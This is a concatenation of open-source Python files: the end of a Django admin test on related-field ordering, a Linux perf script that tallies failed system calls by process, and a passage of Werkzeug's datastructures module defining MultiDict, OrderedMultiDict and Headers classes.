names = [s.name for s in inline.get_queryset(request)]
self.assertListEqual(['Jaded', 'Pink', 'Dude (Looks Like a Lady)'], names)
class TestRelatedFieldsAdminOrdering(TestCase):
def setUp(self):
self.b1 = Band.objects.create(name='Pink Floyd', bio='', rank=1)
self.b2 = Band.objects.create(name='Foo Fighters', bio='', rank=5)
# we need to register a custom ModelAdmin (instead of just using
# ModelAdmin) because the field creator tries to find the ModelAdmin
# for the related model
class SongAdmin(admin.ModelAdmin):
pass
admin.site.register(Song, SongAdmin)
def tearDown(self):
admin.site.unregister(Song)
if Band in admin.site._registry:
admin.site.unregister(Band)
def check_ordering_of_field_choices(self, correct_ordering):
fk_field = admin.site._registry[Song].formfield_for_foreignkey(Song.band.field)
m2m_field = admin.site._registry[Song].formfield_for_manytomany(Song.other_interpreters.field)
self.assertListEqual(list(fk_field.queryset), correct_ordering)
self.assertListEqual(list(m2m_field.queryset), correct_ordering)
def test_no_admin_fallback_to_model_ordering(self):
# should be ordered by name (as defined by the model)
self.check_ordering_of_field_choices([self.b2, self.b1])
def test_admin_with_no_ordering_fallback_to_model_ordering(self):
class NoOrderingBandAdmin(admin.ModelAdmin):
pass
admin.site.register(Band, NoOrderingBandAdmin)
# should be ordered by name (as defined by the model)
self.check_ordering_of_field_choices([self.b2, self.b1])
def test_admin_ordering_beats_model_ordering(self):
class StaticOrderingBandAdmin(admin.ModelAdmin):
ordering = ('rank',)
admin.site.register(Band, StaticOrderingBandAdmin)
# should be ordered by rank (defined by the ModelAdmin)
self.check_ordering_of_field_choices([self.b1, self.b2])
def test_custom_queryset_still_wins(self):
"""Test that custom queryset has still precedence (#21405)"""
class SongAdmin(admin.ModelAdmin):
# Exclude one of the two Bands from the querysets
def formfield_for_foreignkey(self, db_field, **kwargs):
if db_field.name == 'band':
kwargs["queryset"] = Band.objects.filter(rank__gt=2)
return super(SongAdmin, self).formfield_for_foreignkey(db_field, **kwargs)
def formfield_for_manytomany(self, db_field, **kwargs):
if db_field.name == 'other_interpreters':
kwargs["queryset"] = Band.objects.filter(rank__gt=2)
return super(SongAdmin, self).formfield_for_foreignkey(db_field, **kwargs)
class StaticOrderingBandAdmin(admin.ModelAdmin):
ordering = ('rank',)
admin.site.unregister(Song)
admin.site.register(Song, SongAdmin)
admin.site.register(Band, StaticOrderingBandAdmin)
self.check_ordering_of_field_choices([self.b2])
| bsd-3-clause |
bugralevent/linux | tools/perf/scripts/python/failed-syscalls-by-pid.py | 1996 | 2233 | # failed system call counts, by pid
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide failed system call totals, broken down by pid.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
usage = "perf script -s syscall-counts-by-pid.py [comm|pid]\n";
for_comm = None
for_pid = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
try:
for_pid = int(sys.argv[1])
except:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_error_totals()
def raw_syscalls__sys_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, id, ret):
if (for_comm and common_comm != for_comm) or \
(for_pid and common_pid != for_pid ):
return
if ret < 0:
try:
syscalls[common_comm][common_pid][id][ret] += 1
except TypeError:
syscalls[common_comm][common_pid][id][ret] = 1
def syscalls__sys_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, ret):
raw_syscalls__sys_exit(**locals())
def print_error_totals():
if for_comm is not None:
print "\nsyscall errors for %s:\n\n" % (for_comm),
else:
print "\nsyscall errors:\n\n",
print "%-30s %10s\n" % ("comm [pid]", "count"),
print "%-30s %10s\n" % ("------------------------------", \
"----------"),
comm_keys = syscalls.keys()
for comm in comm_keys:
pid_keys = syscalls[comm].keys()
for pid in pid_keys:
print "\n%s [%d]\n" % (comm, pid),
id_keys = syscalls[comm][pid].keys()
for id in id_keys:
print " syscall: %-16s\n" % syscall_name(id),
ret_keys = syscalls[comm][pid][id].keys()
for ret, val in sorted(syscalls[comm][pid][id].iteritems(), key = lambda(k, v): (v, k), reverse = True):
print " err = %-20s %10d\n" % (strerror(ret), val),
| gpl-2.0 |
GeekTrainer/Flask | Work/TriviaMVA/TriviaMVA/env/Lib/site-packages/werkzeug/datastructures.py | 146 | 86337 | # -*- coding: utf-8 -*-
"""
werkzeug.datastructures
~~~~~~~~~~~~~~~~~~~~~~~
This module provides mixins and classes with an immutable interface.
:copyright: (c) 2014 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import re
import sys
import codecs
import mimetypes
from copy import deepcopy
from itertools import repeat
from werkzeug._internal import _missing, _empty_stream
from werkzeug._compat import iterkeys, itervalues, iteritems, iterlists, \
PY2, text_type, integer_types, string_types, make_literal_wrapper, \
to_native
_locale_delim_re = re.compile(r'[_-]')
def is_immutable(self):
raise TypeError('%r objects are immutable' % self.__class__.__name__)
def iter_multi_items(mapping):
"""Iterates over the items of a mapping yielding keys and values
without dropping any from more complex structures.
"""
if isinstance(mapping, MultiDict):
for item in iteritems(mapping, multi=True):
yield item
elif isinstance(mapping, dict):
for key, value in iteritems(mapping):
if isinstance(value, (tuple, list)):
for value in value:
yield key, value
else:
yield key, value
else:
for item in mapping:
yield item
def native_itermethods(names):
if not PY2:
return lambda x: x
def setmethod(cls, name):
itermethod = getattr(cls, name)
setattr(cls, 'iter%s' % name, itermethod)
listmethod = lambda self, *a, **kw: list(itermethod(self, *a, **kw))
listmethod.__doc__ = \
'Like :py:meth:`iter%s`, but returns a list.' % name
setattr(cls, name, listmethod)
def wrap(cls):
for name in names:
setmethod(cls, name)
return cls
return wrap
class ImmutableListMixin(object):
"""Makes a :class:`list` immutable.
.. versionadded:: 0.5
:private:
"""
_hash_cache = None
def __hash__(self):
if self._hash_cache is not None:
return self._hash_cache
rv = self._hash_cache = hash(tuple(self))
return rv
def __reduce_ex__(self, protocol):
return type(self), (list(self),)
def __delitem__(self, key):
is_immutable(self)
def __delslice__(self, i, j):
is_immutable(self)
def __iadd__(self, other):
is_immutable(self)
__imul__ = __iadd__
def __setitem__(self, key, value):
is_immutable(self)
def __setslice__(self, i, j, value):
is_immutable(self)
def append(self, item):
is_immutable(self)
remove = append
def extend(self, iterable):
is_immutable(self)
def insert(self, pos, value):
is_immutable(self)
def pop(self, index=-1):
is_immutable(self)
def reverse(self):
is_immutable(self)
def sort(self, cmp=None, key=None, reverse=None):
is_immutable(self)
class ImmutableList(ImmutableListMixin, list):
"""An immutable :class:`list`.
.. versionadded:: 0.5
:private:
"""
def __repr__(self):
return '%s(%s)' % (
self.__class__.__name__,
dict.__repr__(self),
)
class ImmutableDictMixin(object):
"""Makes a :class:`dict` immutable.
.. versionadded:: 0.5
:private:
"""
_hash_cache = None
@classmethod
def fromkeys(cls, keys, value=None):
instance = super(cls, cls).__new__(cls)
instance.__init__(zip(keys, repeat(value)))
return instance
def __reduce_ex__(self, protocol):
return type(self), (dict(self),)
def _iter_hashitems(self):
return iteritems(self)
def __hash__(self):
if self._hash_cache is not None:
return self._hash_cache
rv = self._hash_cache = hash(frozenset(self._iter_hashitems()))
return rv
def setdefault(self, key, default=None):
is_immutable(self)
def update(self, *args, **kwargs):
is_immutable(self)
def pop(self, key, default=None):
is_immutable(self)
def popitem(self):
is_immutable(self)
def __setitem__(self, key, value):
is_immutable(self)
def __delitem__(self, key):
is_immutable(self)
def clear(self):
is_immutable(self)
class ImmutableMultiDictMixin(ImmutableDictMixin):
"""Makes a :class:`MultiDict` immutable.
.. versionadded:: 0.5
:private:
"""
def __reduce_ex__(self, protocol):
return type(self), (list(iteritems(self, multi=True)),)
def _iter_hashitems(self):
return iteritems(self, multi=True)
def add(self, key, value):
is_immutable(self)
def popitemlist(self):
is_immutable(self)
def poplist(self, key):
is_immutable(self)
def setlist(self, key, new_list):
is_immutable(self)
def setlistdefault(self, key, default_list=None):
is_immutable(self)
class UpdateDictMixin(object):
"""Makes dicts call `self.on_update` on modifications.
.. versionadded:: 0.5
:private:
"""
on_update = None
def calls_update(name):
def oncall(self, *args, **kw):
rv = getattr(super(UpdateDictMixin, self), name)(*args, **kw)
if self.on_update is not None:
self.on_update(self)
return rv
oncall.__name__ = name
return oncall
def setdefault(self, key, default=None):
modified = key not in self
rv = super(UpdateDictMixin, self).setdefault(key, default)
if modified and self.on_update is not None:
self.on_update(self)
return rv
def pop(self, key, default=_missing):
modified = key in self
if default is _missing:
rv = super(UpdateDictMixin, self).pop(key)
else:
rv = super(UpdateDictMixin, self).pop(key, default)
if modified and self.on_update is not None:
self.on_update(self)
return rv
__setitem__ = calls_update('__setitem__')
__delitem__ = calls_update('__delitem__')
clear = calls_update('clear')
popitem = calls_update('popitem')
update = calls_update('update')
del calls_update
class TypeConversionDict(dict):
"""Works like a regular dict but the :meth:`get` method can perform
type conversions. :class:`MultiDict` and :class:`CombinedMultiDict`
are subclasses of this class and provide the same feature.
.. versionadded:: 0.5
"""
def get(self, key, default=None, type=None):
"""Return the default value if the requested data doesn't exist.
If `type` is provided and is a callable it should convert the value,
return it or raise a :exc:`ValueError` if that is not possible. In
this case the function will return the default as if the value was not
found:
>>> d = TypeConversionDict(foo='42', bar='blub')
>>> d.get('foo', type=int)
42
>>> d.get('bar', -1, type=int)
-1
:param key: The key to be looked up.
:param default: The default value to be returned if the key can't
be looked up. If not further specified `None` is
returned.
:param type: A callable that is used to cast the value in the
:class:`MultiDict`. If a :exc:`ValueError` is raised
by this callable the default value is returned.
"""
try:
rv = self[key]
if type is not None:
rv = type(rv)
except (KeyError, ValueError):
rv = default
return rv
class ImmutableTypeConversionDict(ImmutableDictMixin, TypeConversionDict):
"""Works like a :class:`TypeConversionDict` but does not support
modifications.
.. versionadded:: 0.5
"""
def copy(self):
"""Return a shallow mutable copy of this object. Keep in mind that
the standard library's :func:`copy` function is a no-op for this class
like for any other python immutable type (eg: :class:`tuple`).
"""
return TypeConversionDict(self)
def __copy__(self):
return self
@native_itermethods(['keys', 'values', 'items', 'lists', 'listvalues'])
class MultiDict(TypeConversionDict):
"""A :class:`MultiDict` is a dictionary subclass customized to deal with
multiple values for the same key which is for example used by the parsing
functions in the wrappers. This is necessary because some HTML form
elements pass multiple values for the same key.
:class:`MultiDict` implements all standard dictionary methods.
Internally, it saves all values for a key as a list, but the standard dict
access methods will only return the first value for a key. If you want to
gain access to the other values, too, you have to use the `list` methods as
explained below.
Basic Usage:
>>> d = MultiDict([('a', 'b'), ('a', 'c')])
>>> d
MultiDict([('a', 'b'), ('a', 'c')])
>>> d['a']
'b'
>>> d.getlist('a')
['b', 'c']
>>> 'a' in d
True
It behaves like a normal dict thus all dict functions will only return the
first value when multiple values for one key are found.
From Werkzeug 0.3 onwards, the `KeyError` raised by this class is also a
subclass of the :exc:`~exceptions.BadRequest` HTTP exception and will
render a page for a ``400 BAD REQUEST`` if caught in a catch-all for HTTP
exceptions.
A :class:`MultiDict` can be constructed from an iterable of
``(key, value)`` tuples, a dict, a :class:`MultiDict` or from Werkzeug 0.2
onwards some keyword parameters.
:param mapping: the initial value for the :class:`MultiDict`. Either a
regular dict, an iterable of ``(key, value)`` tuples
or `None`.
"""
def __init__(self, mapping=None):
if isinstance(mapping, MultiDict):
dict.__init__(self, ((k, l[:]) for k, l in iterlists(mapping)))
elif isinstance(mapping, dict):
tmp = {}
for key, value in iteritems(mapping):
if isinstance(value, (tuple, list)):
value = list(value)
else:
value = [value]
tmp[key] = value
dict.__init__(self, tmp)
else:
tmp = {}
for key, value in mapping or ():
tmp.setdefault(key, []).append(value)
dict.__init__(self, tmp)
def __getstate__(self):
return dict(self.lists())
def __setstate__(self, value):
dict.clear(self)
dict.update(self, value)
def __getitem__(self, key):
"""Return the first data value for this key;
raises KeyError if not found.
:param key: The key to be looked up.
:raise KeyError: if the key does not exist.
"""
if key in self:
return dict.__getitem__(self, key)[0]
raise exceptions.BadRequestKeyError(key)
def __setitem__(self, key, value):
"""Like :meth:`add` but removes an existing key first.
:param key: the key for the value.
:param value: the value to set.
"""
dict.__setitem__(self, key, [value])
def add(self, key, value):
"""Adds a new value for the key.
.. versionadded:: 0.6
:param key: the key for the value.
:param value: the value to add.
"""
dict.setdefault(self, key, []).append(value)
def getlist(self, key, type=None):
"""Return the list of items for a given key. If that key is not in the
`MultiDict`, the return value will be an empty list. Just as `get`
`getlist` accepts a `type` parameter. All items will be converted
with the callable defined there.
:param key: The key to be looked up.
:param type: A callable that is used to cast the value in the
:class:`MultiDict`. If a :exc:`ValueError` is raised
by this callable the value will be removed from the list.
:return: a :class:`list` of all the values for the key.
"""
try:
rv = dict.__getitem__(self, key)
except KeyError:
return []
if type is None:
return list(rv)
result = []
for item in rv:
try:
result.append(type(item))
except ValueError:
pass
return result
def setlist(self, key, new_list):
"""Remove the old values for a key and add new ones. Note that the list
you pass the values in will be shallow-copied before it is inserted in
the dictionary.
>>> d = MultiDict()
>>> d.setlist('foo', ['1', '2'])
>>> d['foo']
'1'
>>> d.getlist('foo')
['1', '2']
:param key: The key for which the values are set.
:param new_list: An iterable with the new values for the key. Old values
are removed first.
"""
dict.__setitem__(self, key, list(new_list))
def setdefault(self, key, default=None):
"""Returns the value for the key if it is in the dict, otherwise it
returns `default` and sets that value for `key`.
:param key: The key to be looked up.
:param default: The default value to be returned if the key is not
in the dict. If not further specified it's `None`.
"""
if key not in self:
self[key] = default
else:
default = self[key]
return default
def setlistdefault(self, key, default_list=None):
"""Like `setdefault` but sets multiple values. The list returned
is not a copy, but the list that is actually used internally. This
means that you can put new values into the dict by appending items
to the list:
>>> d = MultiDict({"foo": 1})
>>> d.setlistdefault("foo").extend([2, 3])
>>> d.getlist("foo")
[1, 2, 3]
:param key: The key to be looked up.
:param default: An iterable of default values. It is either copied
(in case it was a list) or converted into a list
before returned.
:return: a :class:`list`
"""
if key not in self:
default_list = list(default_list or ())
dict.__setitem__(self, key, default_list)
else:
default_list = dict.__getitem__(self, key)
return default_list
def items(self, multi=False):
"""Return an iterator of ``(key, value)`` pairs.
:param multi: If set to `True` the iterator returned will have a pair
for each value of each key. Otherwise it will only
contain pairs for the first value of each key.
"""
for key, values in iteritems(dict, self):
if multi:
for value in values:
yield key, value
else:
yield key, values[0]
def lists(self):
"""Return a list of ``(key, values)`` pairs, where values is the list
of all values associated with the key."""
for key, values in iteritems(dict, self):
yield key, list(values)
def keys(self):
return iterkeys(dict, self)
__iter__ = keys
def values(self):
"""Returns an iterator of the first value on every key's value list."""
for values in itervalues(dict, self):
yield values[0]
def listvalues(self):
"""Return an iterator of all values associated with a key. Zipping
:meth:`keys` and this is the same as calling :meth:`lists`:
>>> d = MultiDict({"foo": [1, 2, 3]})
>>> zip(d.keys(), d.listvalues()) == d.lists()
True
"""
return itervalues(dict, self)
def copy(self):
"""Return a shallow copy of this object."""
return self.__class__(self)
def deepcopy(self, memo=None):
"""Return a deep copy of this object."""
return self.__class__(deepcopy(self.to_dict(flat=False), memo))
def to_dict(self, flat=True):
"""Return the contents as regular dict. If `flat` is `True` the
returned dict will only have the first item present, if `flat` is
`False` all values will be returned as lists.
:param flat: If set to `False` the dict returned will have lists
with all the values in it. Otherwise it will only
contain the first value for each key.
:return: a :class:`dict`
"""
if flat:
return dict(iteritems(self))
return dict(self.lists())
def update(self, other_dict):
"""update() extends rather than replaces existing key lists."""
for key, value in iter_multi_items(other_dict):
MultiDict.add(self, key, value)
def pop(self, key, default=_missing):
"""Pop the first item for a list on the dict. Afterwards the
key is removed from the dict, so additional values are discarded:
>>> d = MultiDict({"foo": [1, 2, 3]})
>>> d.pop("foo")
1
>>> "foo" in d
False
:param key: the key to pop.
:param default: if provided the value to return if the key was
not in the dictionary.
"""
try:
return dict.pop(self, key)[0]
except KeyError as e:
if default is not _missing:
return default
raise exceptions.BadRequestKeyError(str(e))
def popitem(self):
"""Pop an item from the dict."""
try:
item = dict.popitem(self)
return (item[0], item[1][0])
except KeyError as e:
raise exceptions.BadRequestKeyError(str(e))
def poplist(self, key):
"""Pop the list for a key from the dict. If the key is not in the dict
an empty list is returned.
.. versionchanged:: 0.5
If the key does no longer exist a list is returned instead of
raising an error.
"""
return dict.pop(self, key, [])
def popitemlist(self):
"""Pop a ``(key, list)`` tuple from the dict."""
try:
return dict.popitem(self)
except KeyError as e:
raise exceptions.BadRequestKeyError(str(e))
def __copy__(self):
return self.copy()
def __deepcopy__(self, memo):
return self.deepcopy(memo=memo)
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, list(iteritems(self, multi=True)))
class _omd_bucket(object):
"""Wraps values in the :class:`OrderedMultiDict`. This makes it
possible to keep an order over multiple different keys. It requires
a lot of extra memory and slows down access a lot, but makes it
possible to access elements in O(1) and iterate in O(n).
"""
__slots__ = ('prev', 'key', 'value', 'next')
def __init__(self, omd, key, value):
self.prev = omd._last_bucket
self.key = key
self.value = value
self.next = None
if omd._first_bucket is None:
omd._first_bucket = self
if omd._last_bucket is not None:
omd._last_bucket.next = self
omd._last_bucket = self
def unlink(self, omd):
if self.prev:
self.prev.next = self.next
if self.next:
self.next.prev = self.prev
if omd._first_bucket is self:
omd._first_bucket = self.next
if omd._last_bucket is self:
omd._last_bucket = self.prev
@native_itermethods(['keys', 'values', 'items', 'lists', 'listvalues'])
class OrderedMultiDict(MultiDict):
"""Works like a regular :class:`MultiDict` but preserves the
order of the fields. To convert the ordered multi dict into a
list you can use the :meth:`items` method and pass it ``multi=True``.
In general an :class:`OrderedMultiDict` is an order of magnitude
slower than a :class:`MultiDict`.
.. admonition:: note
Due to a limitation in Python you cannot convert an ordered
multi dict into a regular dict by using ``dict(multidict)``.
Instead you have to use the :meth:`to_dict` method, otherwise
the internal bucket objects are exposed.
"""
def __init__(self, mapping=None):
dict.__init__(self)
self._first_bucket = self._last_bucket = None
if mapping is not None:
OrderedMultiDict.update(self, mapping)
def __eq__(self, other):
if not isinstance(other, MultiDict):
return NotImplemented
if isinstance(other, OrderedMultiDict):
iter1 = iteritems(self, multi=True)
iter2 = iteritems(other, multi=True)
try:
for k1, v1 in iter1:
k2, v2 = next(iter2)
if k1 != k2 or v1 != v2:
return False
except StopIteration:
return False
try:
next(iter2)
except StopIteration:
return True
return False
if len(self) != len(other):
return False
for key, values in iterlists(self):
if other.getlist(key) != values:
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
def __reduce_ex__(self, protocol):
return type(self), (list(iteritems(self, multi=True)),)
def __getstate__(self):
return list(iteritems(self, multi=True))
def __setstate__(self, values):
dict.clear(self)
for key, value in values:
self.add(key, value)
def __getitem__(self, key):
if key in self:
return dict.__getitem__(self, key)[0].value
raise exceptions.BadRequestKeyError(key)
def __setitem__(self, key, value):
self.poplist(key)
self.add(key, value)
def __delitem__(self, key):
self.pop(key)
def keys(self):
return (key for key, value in iteritems(self))
__iter__ = keys
def values(self):
return (value for key, value in iteritems(self))
def items(self, multi=False):
ptr = self._first_bucket
if multi:
while ptr is not None:
yield ptr.key, ptr.value
ptr = ptr.next
else:
returned_keys = set()
while ptr is not None:
if ptr.key not in returned_keys:
returned_keys.add(ptr.key)
yield ptr.key, ptr.value
ptr = ptr.next
def lists(self):
returned_keys = set()
ptr = self._first_bucket
while ptr is not None:
if ptr.key not in returned_keys:
yield ptr.key, self.getlist(ptr.key)
returned_keys.add(ptr.key)
ptr = ptr.next
def listvalues(self):
for key, values in iterlists(self):
yield values
def add(self, key, value):
dict.setdefault(self, key, []).append(_omd_bucket(self, key, value))
def getlist(self, key, type=None):
try:
rv = dict.__getitem__(self, key)
except KeyError:
return []
if type is None:
return [x.value for x in rv]
result = []
for item in rv:
try:
result.append(type(item.value))
except ValueError:
pass
return result
def setlist(self, key, new_list):
self.poplist(key)
for value in new_list:
self.add(key, value)
def setlistdefault(self, key, default_list=None):
raise TypeError('setlistdefault is unsupported for '
'ordered multi dicts')
def update(self, mapping):
for key, value in iter_multi_items(mapping):
OrderedMultiDict.add(self, key, value)
def poplist(self, key):
buckets = dict.pop(self, key, ())
for bucket in buckets:
bucket.unlink(self)
return [x.value for x in buckets]
def pop(self, key, default=_missing):
try:
buckets = dict.pop(self, key)
except KeyError as e:
if default is not _missing:
return default
raise exceptions.BadRequestKeyError(str(e))
for bucket in buckets:
bucket.unlink(self)
return buckets[0].value
def popitem(self):
try:
key, buckets = dict.popitem(self)
except KeyError as e:
raise exceptions.BadRequestKeyError(str(e))
for bucket in buckets:
bucket.unlink(self)
return key, buckets[0].value
def popitemlist(self):
try:
key, buckets = dict.popitem(self)
except KeyError as e:
raise exceptions.BadRequestKeyError(str(e))
for bucket in buckets:
bucket.unlink(self)
return key, [x.value for x in buckets]
def _options_header_vkw(value, kw):
return dump_options_header(value, dict((k.replace('_', '-'), v)
for k, v in kw.items()))
def _unicodify_header_value(value):
if isinstance(value, bytes):
value = value.decode('latin-1')
if not isinstance(value, text_type):
value = text_type(value)
return value
@native_itermethods(['keys', 'values', 'items'])
class Headers(object):
"""An object that stores some headers. It has a dict-like interface
but is ordered and can store the same keys multiple times.
This data structure is useful if you want a nicer way to handle WSGI
headers which are stored as tuples in a list.
From Werkzeug 0.3 onwards, the :exc:`KeyError` raised by this class is
also a subclass of the :class:`~exceptions.BadRequest` HTTP exception
and will render a page for a ``400 BAD REQUEST`` if caught in a
catch-all for HTTP exceptions.
Headers is mostly compatible with the Python :class:`wsgiref.headers.Headers`
class, with the exception of `__getitem__`. :mod:`wsgiref` will return
`None` for ``headers['missing']``, whereas :class:`Headers` will raise
a :class:`KeyError`.
To create a new :class:`Headers` object pass it a list or dict of headers
which are used as default values. This does not reuse the list passed
to the constructor for internal usage.
:param defaults: The list of default values for the :class:`Headers`.
.. versionchanged:: 0.9
This data structure now stores unicode values similar to how the
multi dicts do it. The main difference is that bytes can be set as
well which will automatically be latin1 decoded.
.. versionchanged:: 0.9
The :meth:`linked` function was removed without replacement as it
was an API that does not support the changes to the encoding model.
"""
def __init__(self, defaults=None):
self._list = []
if defaults is not None:
if isinstance(defaults, (list, Headers)):
self._list.extend(defaults)
else:
self.extend(defaults)
def __getitem__(self, key, _get_mode=False):
if not _get_mode:
if isinstance(key, integer_types):
return self._list[key]
elif isinstance(key, slice):
return self.__class__(self._list[key])
if not isinstance(key, string_types):
raise exceptions.BadRequestKeyError(key)
ikey = key.lower()
for k, v in self._list:
if k.lower() == ikey:
return v
# micro optimization: if we are in get mode we will catch that
# exception one stack level down so we can raise a standard
# key error instead of our special one.
if _get_mode:
raise KeyError()
raise exceptions.BadRequestKeyError(key)
def __eq__(self, other):
return other.__class__ is self.__class__ and \
set(other._list) == set(self._list)
def __ne__(self, other):
return not self.__eq__(other)
def get(self, key, default=None, type=None, as_bytes=False):
"""Return the default value if the requested data doesn't exist.
If `type` is provided and is a callable it should convert the value,
return it or raise a :exc:`ValueError` if that is not possible. In
this case the function will return the default as if the value was not
found:
>>> d = Headers([('Content-Length', '42')])
>>> d.get('Content-Length', type=int)
42
If a headers object is bound you must not add unicode strings
because no encoding takes place.
.. versionadded:: 0.9
Added support for `as_bytes`.
:param key: The key to be looked up.
:param default: The default value to be returned if the key can't
be looked up. If not further specified `None` is
returned.
:param type: A callable that is used to cast the value in the
:class:`Headers`. If a :exc:`ValueError` is raised
by this callable the default value is returned.
:param as_bytes: return bytes instead of unicode strings.
"""
try:
rv = self.__getitem__(key, _get_mode=True)
except KeyError:
return default
if as_bytes:
rv = rv.encode('latin1')
if type is None:
return rv
try:
return type(rv)
except ValueError:
return default
def getlist(self, key, type=None, as_bytes=False):
"""Return the list of items for a given key. If that key is not in the
:class:`Headers`, the return value will be an empty list. Just as
:meth:`get` :meth:`getlist` accepts a `type` parameter. All items will
be converted with the callable defined there.
.. versionadded:: 0.9
Added support for `as_bytes`.
:param key: The key to be looked up.
:param type: A callable that is used to cast the value in the
:class:`Headers`. If a :exc:`ValueError` is raised
by this callable the value will be removed from the list.
:return: a :class:`list` of all the values for the key.
:param as_bytes: return bytes instead of unicode strings.
"""
ikey = key.lower()
result = []
for k, v in self:
if k.lower() == ikey:
if as_bytes:
v = v.encode('latin1')
if type is not None:
try:
v = type(v)
except ValueError:
continue
result.append(v)
return result
def get_all(self, name):
"""Return a list of all the values for the named field.
This method is compatible with the :mod:`wsgiref`
:meth:`~wsgiref.headers.Headers.get_all` method.
"""
return self.getlist(name)
def items(self, lower=False):
for key, value in self:
if lower:
key = key.lower()
yield key, value
def keys(self, lower=False):
for key, _ in iteritems(self, lower):
yield key
def values(self):
for _, value in iteritems(self):
yield value
def extend(self, iterable):
"""Extend the headers with a dict or an iterable yielding keys and
values.
"""
if isinstance(iterable, dict):
for key, value in iteritems(iterable):
if isinstance(value, (tuple, list)):
for v in value:
self.add(key, v)
else:
self.add(key, value)
else:
for key, value in iterable:
self.add(key, value)
def __delitem__(self, key, _index_operation=True):
if _index_operation and isinstance(key, (integer_types, slice)):
del self._list[key]
return
key = key.lower()
new = []
for k, v in self._list:
if k.lower() != key:
new.append((k, v))
self._list[:] = new
def remove(self, key):
"""Remove a key.
:param key: The key to be removed.
"""
return self.__delitem__(key, _index_operation=False)
def pop(self, key=None, default=_missing):
"""Removes and returns a key or index.
:param key: The key to be popped. If this is an integer the item at
that position is removed, if it's a string the value for
that key is. If the key is omitted or `None` the last
item is removed.
:return: an item.
"""
if key is None:
return self._list.pop()
if isinstance(key, integer_types):
return self._list.pop(key)
try:
rv = self[key]
self.remove(key)
except KeyError:
if default is not _missing:
return default
raise
return rv
def popitem(self):
"""Removes a key or index and returns a (key, value) item."""
return self.pop()
def __contains__(self, key):
"""Check if a key is present."""
try:
self.__getitem__(key, _get_mode=True)
except KeyError:
return False
return True
has_key = __contains__
def __iter__(self):
"""Yield ``(key, value)`` tuples."""
return iter(self._list)
def __len__(self):
return len(self._list)
def add(self, _key, _value, **kw):
"""Add a new header tuple to the list.
Keyword arguments can specify additional parameters for the header
value, with underscores converted to dashes::
>>> d = Headers()
>>> d.add('Content-Type', 'text/plain')
>>> d.add('Content-Disposition', 'attachment', filename='foo.png')
The keyword argument dumping uses :func:`dump_options_header`
behind the scenes.
.. versionadded:: 0.4.1
keyword arguments were added for :mod:`wsgiref` compatibility.
"""
if kw:
_value = _options_header_vkw(_value, kw)
_value = _unicodify_header_value(_value)
self._validate_value(_value)
self._list.append((_key, _value))
def _validate_value(self, value):
if not isinstance(value, text_type):
raise TypeError('Value should be unicode.')
if u'\n' in value or u'\r' in value:
raise ValueError('Detected newline in header value. This is '
'a potential security problem')
def add_header(self, _key, _value, **_kw):
"""Add a new header tuple to the list.
An alias for :meth:`add` for compatibility with the :mod:`wsgiref`
:meth:`~wsgiref.headers.Headers.add_header` method.
"""
self.add(_key, _value, **_kw)
def clear(self):
"""Clears all headers."""
del self._list[:]
def set(self, _key, _value, **kw):
"""Remove all header tuples for `key` and add a new one. The newly
added key either appears at the end of the list if there was no
entry or replaces the first one.
Keyword arguments can specify additional parameters for the header
value, with underscores converted to dashes. See :meth:`add` for
more information.
.. versionchanged:: 0.6.1
:meth:`set` now accepts the same arguments as :meth:`add`.
:param key: The key to be inserted.
:param value: The value to be inserted.
"""
if kw:
_value = _options_header_vkw(_value, kw)
_value = _unicodify_header_value(_value)
self._validate_value(_value)
if not self._list:
self._list.append((_key, _value))
return
listiter = iter(self._list)
ikey = _key.lower()
for idx, (old_key, old_value) in enumerate(listiter):
if old_key.lower() == ikey:
# replace first ocurrence
self._list[idx] = (_key, _value)
break
else:
self._list.append((_key, _value))
return
self._list[idx + 1:] = [t for t in listiter if t[0].lower() != ikey]
def setdefault(self, key, value):
"""Returns the value for the key if it is in the dict, otherwise it
returns `default` and sets that value for `key`.
:param key: The key to be looked up.
:param default: The default value to be returned if the key is not
in the dict. If not further specified it's `None`.
"""
if key in self:
return self[key]
self.set(key, value)
return value
def __setitem__(self, key, value):
"""Like :meth:`set` but also supports index/slice based setting."""
if isinstance(key, (slice, integer_types)):
if isinstance(key, integer_types):
value = [value]
value = [(k, _unicodify_header_value(v)) for (k, v) in value]
[self._validate_value(v) for (k, v) in value]
if isinstance(key, integer_types):
self._list[key] = value[0]
else:
self._list[key] = value
else:
self.set(key, value)
def to_list(self, charset='iso-8859-1'):
"""Convert the headers into a list suitable for WSGI."""
from warnings import warn
warn(DeprecationWarning('Method removed, use to_wsgi_list instead'),
stacklevel=2)
return self.to_wsgi_list()
def to_wsgi_list(self):
"""Convert the headers into a list suitable for WSGI.
The values are byte strings in Python 2 converted to latin1 and unicode
strings in Python 3 for the WSGI server to encode.
:return: list
"""
if PY2:
return [(to_native(k), v.encode('latin1')) for k, v in self]
return list(self)
def copy(self):
return self.__class__(self._list)
def __copy__(self):
return self.copy()
def __str__(self):
"""Returns formatted headers suitable for HTTP transmission."""
strs = []
for key, value in self.to_wsgi_list():
strs.append('%s: %s' % (key, value))
strs.append('\r\n')
return '\r\n'.join(strs)
def __repr__(self):
return '%s(%r)' % (
self.__class__.__name__,
list(self)
)
class ImmutableHeadersMixin(object):
"""Makes a :class:`Headers` immutable. We do not mark them as
hashable though since the only usecase for this datastructure
in Werkzeug is a view on a mutable structure.
.. versionadded:: 0.5
:private:
"""
def __delitem__(self, key):
is_immutable(self)
def __setitem__(self, key, value):
is_immutable(self)
set = __setitem__
def add(self, item):
is_immutable(self)
remove = add_header = add
def extend(self, iterable):
is_immutable(self)
def insert(self, pos, value):
is_immutable(self)
def pop(self, index=-1):
is_immutable(self)
def popitem(self):
is_immutable(self)
def setdefault(self, key, default):
is_immutable(self)
